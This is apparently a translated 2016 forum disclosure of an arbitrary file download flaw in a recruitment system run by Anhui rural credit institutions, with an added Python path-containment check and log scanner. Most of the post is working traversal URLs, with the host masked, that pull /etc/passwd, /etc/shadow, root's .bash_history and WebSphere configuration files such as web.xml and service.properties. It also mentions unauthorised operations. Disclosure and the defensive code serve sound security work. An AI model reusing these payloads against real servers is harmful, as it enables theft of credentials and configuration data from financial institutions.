HanDs
Administrator

[July vulnerability disclosure] A system of Anhui Rural Credit (安徽农金) has an arbitrary file download vulnerability






Arbitrary file download

Details:

Anhui Rural Credit (安徽农金) refers to the rural cooperative financial institutions of Anhui Province, which include rural commercial banks, rural cooperative banks and rural credit cooperative unions.

In practice, these are the institutions concerned:

(Screenshot: QQ截图20160527174014.png)





**.**.**.**:9080/recruit/

(Screenshot: QQ截图20160527165951.png)





Code area:
**.**.**.**:9080/recruit/biz09/T090101.shtml?fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&action=downLoad



(Screenshot: QQ截图20160527170155.png)

Proof of vulnerability:

**.**.**.**:9080/recruit/biz09/T090101.shtml?fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhosts&action=downLoad

(Screenshot: QQ截图20160527170216.png)





**.**.**.**:9080/recruit/biz09/T090101.shtml?fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&action=downLoad

(Screenshot: QQ截图20160527170253.png)





**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Froot%2F.bash_history

(Screenshot: QQ截图20160527170450.png)





Analysing .bash_history showed that it was very informative, and it revealed the following files:

Code area:
**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/web.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/report/reportConfig.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-config.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-system.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-biz09.xml


**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-index.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/struts-cfg/struts-recruit.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/system/logAcc.shtml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/classes/sql-map-config.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/classes/service.properties
**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/recs_war.ear/recs.war/WEB-INF/classes/spring/applicationContext.xml

**.**.**.**:9080/recruit/biz09/T090101.shtml?action=downLoad&fileName=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/zpxtappCell01/zhaopin_war.ear/zhaopin.war/WEB-INF/classes/conf.properties



The system hosts 2 sites in total:

one is zhaopin.war; the other is recs.war.

Some other leaked paths remain to be explored:

(Screenshot: QQ截图20160527213911.png)





Using some of the leaked web paths, we can also attempt unauthorised operations:

(Screenshot: QQ截图20160527213952.png)

(Screenshot: QQ截图20160527214218.png)

(Screenshot: QQ截图20160527214242.png)

(Screenshot: QQ截图20160527214309.png)

Fix:

Filter ../
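As an added example (not part of the original report, and not the affected application's own code), here is the containment check that the fix above calls for, written in Python rather than the Java/Struts stack of the recruit application: the decoded fileName value is joined under a fixed download root and the normalized result must stay strictly inside that root, which holds up better than a plain string filter for ../ and also lets a defender sweep access logs for past abuse. The download root and the log lines are constructed for this example.

```python
import posixpath
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed download root; the real folder used by the recruit app is
# not stated in the report (assumption for this example).
DOWNLOAD_ROOT = "/srv/recruit/downloads"


def contained_path(root: str, file_name: str) -> Optional[str]:
    """Normalized path of file_name under root, or None if it escapes.
    file_name is the value after the container's URL decoding (what the
    Servlet API's getParameter() returns); it must not be decoded again."""
    if not file_name or "\x00" in file_name:
        return None
    # Drop leading slashes and unify separators so the value is always
    # joined as a relative name, never taken as an absolute path.
    relative = file_name.replace("\\", "/").lstrip("/")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, relative))
    # Decisive check: after collapsing every "..", the path must still be
    # strictly inside root. On a live host resolve symlinks first
    # (os.path.realpath) and apply the same comparison.
    if not candidate.startswith(root_norm + "/"):
        return None
    return candidate


def flag_traversal(log_lines: List[str], root: str = DOWNLOAD_ROOT) -> List[str]:
    """Return fileName values from access-log requests that escape root."""
    flagged = []
    for line in log_lines:
        # Minimal combined-log parsing: the URL is the second token of the
        # quoted request field, e.g. "GET /recruit/...?fileName=x HTTP/1.1".
        try:
            url = line.split('"')[1].split()[1]
        except IndexError:
            continue
        for value in parse_qs(urlsplit(url).query).get("fileName", []):
            if contained_path(root, value) is None:
                flagged.append(value)
    return flagged


# Constructed sample log lines shaped like the requests in the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/May/2016:17:01:55 +0800] "GET /recruit/biz09/T090101.shtml'
    '?fileName=%2F..%2F..%2F..%2Fetc%2Fpasswd&action=downLoad HTTP/1.1" 200 1024',
    '10.0.0.6 - - [27/May/2016:17:02:10 +0800] "GET /recruit/biz09/T090101.shtml'
    '?fileName=notice_2016.pdf&action=downLoad HTTP/1.1" 200 53210',
]
```

Running flag_traversal(SAMPLE_LOG) flags only the first request; a legitimate filename such as notice_2016.pdf resolves to a path under the root and passes.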


Posted: 2016-7-15   |   Views: 0   |   Replies: 0